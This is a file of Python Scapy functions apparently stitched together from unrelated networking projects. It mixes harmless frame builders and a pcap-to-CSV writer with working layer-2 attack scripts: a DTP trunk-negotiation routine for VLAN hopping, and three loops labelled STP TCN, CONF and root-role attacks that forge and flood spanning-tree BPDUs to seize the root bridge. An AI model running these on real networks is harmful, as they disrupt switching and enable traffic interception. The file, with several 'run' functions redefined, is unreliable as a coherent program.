def negotiate_trunk(iface=conf.iface, mymac=str(RandMAC())):
print("Trying to negotiate a trunk on interface %s" % iface)
p = Dot3(src=mymac,
dst="01:00:0c:cc:cc:cc") / LLC() / SNAP() / DTP(tlvlist=[
DTPDomain(),
DTPStatus(),
DTPType(),
DTPNeighbor(neighbor=mymac)
])
sendp(p)
def protocol_frame(protocol, source='unicast', vlans=[]):
""" Create a frame that has the minimum fields to be recognized as a determined protocol.
It's not intended to be a valid PDU, only to be seen as one by the switch filter.
@param protocol Protocol name. Valid options are:
* stp, lldp, lacp, marker, oam, lbd, cdp, pagp, udld, vtp, pvst, dtp, gvrp, gmrp, dot1x
@param source Name of the source interface, or source MAC address.
* 'unicast' to use a random unicast address as source MAC.
@param vlans [optional] List of VLAN Tags.
List can be composed by single integer representing VLAN, or tuple (int, int) for VLAN and prio.
Ex: [(100, 3), 20] will add two tags, one with VLAN 100, prio 3 and another with VLAN 20, prio 0.
"""
if protocol not in pdu_info:
raise Exception("Unknown protocol name {0}".format(protocol))
info = pdu_info[protocol]
# Define source MAC address.
if "eth" in source:
src_mac = str(mac_address(source))
elif source == 'unicast':
src_mac = str(random_mac('unicast'))
else:
src_mac = str(source)
if protocol == 'eaps':
src_mac = "00:e0:2b:00:00:01"
if 'type' in info or vlans:
pdu = Ether(src=src_mac, dst=info['mac'])
for v in vlans:
if type(v) == int:
pdu = pdu / Dot1Q(vlan=v)
elif type(v) == tuple:
pdu = pdu / Dot1Q(vlan=v[0], prio=v[1])
else:
raise TypeError(
"Expected list with int or tuple for VLANs parameter.")
if 'type' in info:
pdu.lastlayer().type = info['type']
else:
pdu = Dot3(src=src_mac, dst=info['mac'])
pdu = pdu / info['load']
# Process PDU so length field is correctly calculated.
pdu = Ether(str(pdu))
# Add Padding and return.
padding = 64 - len(pdu) + 4 #FCS
if padding > 0:
pdu = pdu / Padding(load='\0' * padding)
return pdu
def constructPAS5211Frames(msg, seq, src_mac, dst_mac, channel_id=-1,
onu_id=-1, onu_session_id=-1):
assert isinstance(msg, PAS5211Msg)
opcode = 0x3000 | msg.opcode
inner_msg = PAS5211MsgHeader(
sequence_number=seq,
opcode=opcode,
channel_id=channel_id,
onu_id=onu_id,
onu_session_id=onu_session_id
) / msg
size = len(inner_msg)
frame_body = PAS5211FrameHeader(size=size) / inner_msg
frame = Dot3(src=src_mac, dst=dst_mac) / frame_body
return frame
def run(interface):
"""
This function launch STP TCN ATTACK
:param interface: interface to be launched the attack
:type interface: str
"""
# sniff to found a stp packet
pkt = sniff(stop_filter=lambda x: x.haslayer(STP), iface=interface)
# Look for a STP packet to use a lower priority
pk_list = {x: y for x, y in pkt.sessions().iteritems() if "Other" in x}
item = pk_list.popitem()
pkts = item[1]
for x in pkts:
if STP in x:
STP_packet = x
break
myMAC = get_if_hwaddr(interface)
root_id = STP_packet.rootid - 1
bridge_id = STP_packet.bridgeid - 1
p_ether = Dot3(dst="01:80:c2:00:00:00", src=myMAC)
p_llc = LLC()
p_stp = STP(bpdutype=0x00,
bpduflags=0x01,
portid=0x8002,
rootmac=myMAC,
bridgemac=myMAC,
rootid=root_id,
bridgeid=bridge_id)
pkt = p_ether / p_llc / p_stp # STP packet structure
try:
while 1:
sendp(pkt, iface=interface, verbose=0)
except KeyboardInterrupt:
pass
def run(inter):
"""
This function launch STP TCN ATTACK
:param inter: interface to be launched the attack
:type inter: str
"""
interface = str(inter[0])
if len(interface) > 0:
try:
while 1:
# dst=Ethernet Multicast address used for spanning tree protocol
srcMAC = str(RandMAC()) # Random MAC in each iteration
p_ether = Dot3(dst="01:80:c2:00:00:00", src=srcMAC)
p_llc = LLC()
p_stp = STP(bpdutype=0x80) # TCN packet
pkt = p_ether/p_llc/p_stp # STP packet structure
sendp(pkt, iface=interface, verbose=0)
except KeyboardInterrupt:
pass
def run(inter):
"""
This function launch STP CONF ATTACK
:param inter: interface to be launched the attack
:type inter: str
"""
interface = str(inter[0])
if len(interface) > 0:
try:
while 1:
# Root Identifier 8 bytes (MAC and root priority)
srcMAC = str(RandMAC()) # Random MAC in each iteration
root_prior = int(RandInt()) % 65536 # 2 bytes
# Brigde Identifier (mac and brigde priority)
brigde_prior = int(RandInt()) % 65536 # 2 bytes
# dst=Ethernet Multicast address used for spanning tree protocol
p_ether = Dot3(dst="01:80:c2:00:00:00", src=srcMAC)
p_llc = LLC()
p_stp = STP(bpdutype=0x00,
bpduflags=0x01,
portid=0x8002,
rootmac=srcMAC,
bridgemac=srcMAC,
rootid=root_prior,
bridgeid=brigde_prior) # Conf packet
pkt = p_ether / p_llc / p_stp # STP packet structure
sendp(pkt, iface=interface, verbose=0)
except KeyboardInterrupt:
pass
def l2_frame_from_to(source, destination, vlans = [], seq = 10, size = 64, pattern = '\0', framing = "Ethernet II"):
""" Create a frame using interfaces MACs.
@param source Name of the source interface, or source MAC address.
It can also be:
* 'unicast' to use a random unicast address as source MAC.
@param destination Name of the destination interface, or destination MAC address.
It can also be:
* 'broadcast' to use 'FF:FF:FF:FF:FF:FF' as destination MAC.
* 'multicast' to use a random multicast address as destination MAC.
* 'unicast' to use a random unicast address as destination MAC.
@param vlans [optional] List of VLAN Tags.
List can be composed by single integer representing VLAN, or tuple (int, int) for VLAN and prio.
Ex: [(100, 3), 20] will add two tags, one with VLAN 100, prio 3 and another with VLAN 20, prio 0.
@param seq [optional] Number of sequence
@param size [optional] Size of created frame. A padding based on 'pattern' is added to complete
the frame until size is reached (counting 4 bytes of FCS)
@param pattern [optional] Pattern string used to fill payload. Default is '\0'.
* 'random' to fill the payload with random bytes.
@param framing [optional] Type of frame:
* "Ethernet II" : Ethertype > 1535 and hold information about next layer.
* "802.3" : Ethertype <= 1500 represent payload length. Next header is LLC.
"""
if "eth" in destination:
dst_mac = mac_address(destination)
elif destination == 'broadcast':
dst_mac = 'FF:FF:FF:FF:FF:FF'
elif destination == 'multicast':
dst_mac = str(random_mac('multicast'))
elif destination == 'unicast':
dst_mac = str(random_mac('unicast'))
else:
dst_mac = str(destination)
if "eth" in source:
src_mac = str(mac_address(source))
elif source == 'unicast':
src_mac = str(random_mac('unicast'))
else:
src_mac = str(source)
# When the next layer is Dot1Q, Dot3 will be evaluated as Ether anyway (0x8100 > 1536),
# To keep consistency between creation and dissection, already use Ether even for 802.3 framing.
# The difference will be made as Dot1Q will be followed by LLC header.
if framing == "Ethernet II" or vlans:
frame = Ether(src = src_mac, dst = dst_mac)
elif framing == "802.3":
frame = Dot3(src = src_mac, dst = dst_mac)
else:
raise ValueError("Excpected only 'Ethernet II' or '802.3' as framing types.")
for v in vlans:
if type(v) == int:
frame = frame / Dot1Q(vlan = v)
elif type(v) == tuple:
frame = frame / Dot1Q(vlan = v[0], prio = v[1])
else:
raise TypeError("Expected list with int or tuple for VLANs parameter.")
if framing == "802.3":
frame = frame / LLC() / SNAP()
if seq != None:
frame = frame / L2T(l2t_seq = seq)
return add_payload(frame, size, pattern)
def render_csv_row(pkt_sh, pkt_sc, fh_csv):
"""Write one packet entry into the CSV file.
pkt_sh is the PyShark representation of the packet
pkt_sc is a 'bytes' representation of the packet as returned from
scapy's RawPcapReader
fh_csv is the csv file handle
"""
ether_pkt_sc = Ether(pkt_sc)
if ether_pkt_sc.type != 0x800 and ether_pkt_sc.type != 0x8100:
print('Ignoring non-IP packet')
return False
#extrackt source and destination
l2_dst = ether_pkt_sc.dst
l2_src = ether_pkt_sc.src
dot3_pkt_sc = Dot3(pkt_sc)
l2_len = dot3_pkt_sc.len
#check if fame is iee802.1q
if ether_pkt_sc.type == 0x8100:
# extrackt vlan
dot1q_pkt_sc = Dot1Q(pkt_sc)
l2_prio = dot1q_pkt_sc.prio
l2_id = dot1q_pkt_sc.id
l2_vlan = dot1q_pkt_sc.vlan
else:
l2_prio = 0
l2_id = 0
l2_vlan = 0
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
#+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#| PRIO|I| VLAN | TYPE |
#+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# Each line of the CSV has this format
fmt = '{0}|{1}|{2}|{3}|{4}|{5}|{6}|{7}'
# | | | | | | | |
# | | | | | | | |
# | | | | | | | |
# | | | | | | | |
# | | | | | | | o--------------> {7} idfield
# | | | | | | o------------------> {6} prioirty
# | | | | | o----------------------> {5} vlan id
# | | | | o--------------------------> {4] frame lenght
# | | | o------------------------------> {3} source mac
# | | o----------------------------------> {2} destination mac
# | o--------------------------------------> {1} time
# o------------------------------------------> {0} frame number
print(
fmt.format(
pkt_sh.no, # {0}
pkt_sh.time, # {1}
l2_dst, # {2}
l2_src, # {3}
l2_len, # {4}
l2_vlan, # {5}
l2_prio, # {6}
l2_id), # {7}
file=fh_csv)
return True
def create_base_packet(self):
packet = (
Dot3(src=self.interface.remote_mac, dst="01:00:0c:cc:cc:cc") /
LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03) / SNAP() / CDPv2_HDR())
return packet
def send(self, dst_mac, packet):
sendp(Dot3(src=self._addr, dst=dst_mac) / packet,
iface=self._ifname_,
verbose=False)
def run(interface):
"""
This function launch STP ROOT ROLE ATTACK
:param interface: interface to be launched the attack
:type interface: str
"""
# sniff to found a stp packet
pkt = sniff(stop_filter=lambda x: x.haslayer(STP), iface=interface)
# Look for a STP packet to use a lower priority
pk_list = {x: y for x, y in pkt.sessions().iteritems() if "Other" in x}
item = pk_list.popitem()
pkts = item[1]
for x in pkts:
if STP in x:
STP_packet = x
break
#myMAC = get_if_hwaddr(interface)
#root_id = STP_packet.rootid - 1
#bridge_id = STP_packet.bridgeid - 1
rootMAC = STP_packet.rootmac
bridgeMAC = STP_packet.bridgemac
aux = False
newMAC = ''
rootMAC = rootMAC[::-1]
for x in range(len(rootMAC)):
if (rootMAC[x] in '123456789abcdef') and not aux:
n = int(rootMAC[x], 16)
n -= 1
n = format(n, 'x')
newMAC += n
aux = True
else:
newMAC += rootMAC[x]
rootMAC = newMAC[::-1]
newMAC = ''
aux = False
bridgeMAC = bridgeMAC[::-1]
for x in range(len(bridgeMAC)):
if (bridgeMAC[x] in '123456789abcdef') and not aux:
n = int(bridgeMAC[x], 16)
n -= 1
n = format(n, 'x')
newMAC += n
aux = True
else:
newMAC += bridgeMAC[x]
bridgeMAC = newMAC[::-1]
#brigdemac
root_id = STP_packet.rootid
bridge_id = STP_packet.bridgeid
p_ether = Dot3(dst="01:80:c2:00:00:00", src=bridgeMAC)
p_llc = LLC()
p_stp = STP(bpdutype=0x00,
bpduflags=0x01,
portid=0x8002,
rootmac=rootMAC,
bridgemac=bridgeMAC,
rootid=root_id,
bridgeid=bridge_id)
pkt = p_ether / p_llc / p_stp # STP packet structure
try:
while 1:
pkt_sniff = srp1(pkt, iface=interface, verbose=0, timeout=2)
if pkt_sniff is not None:
if STP in pkt_sniff:
if pkt_sniff[Dot3].src != rootMAC:
p_stp_ack = STP(bpdutype=0x00,
bpduflags=0x81,
portid=0x8002,
rootmac=rootMAC,
bridgemac=bridgeMAC,
rootid=root_id,
bridgeid=bridge_id)
pkt_ack = p_ether / p_llc / p_stp_ack
sendp(pkt_ack, iface=interface, verbose=0)
except KeyboardInterrupt:
pass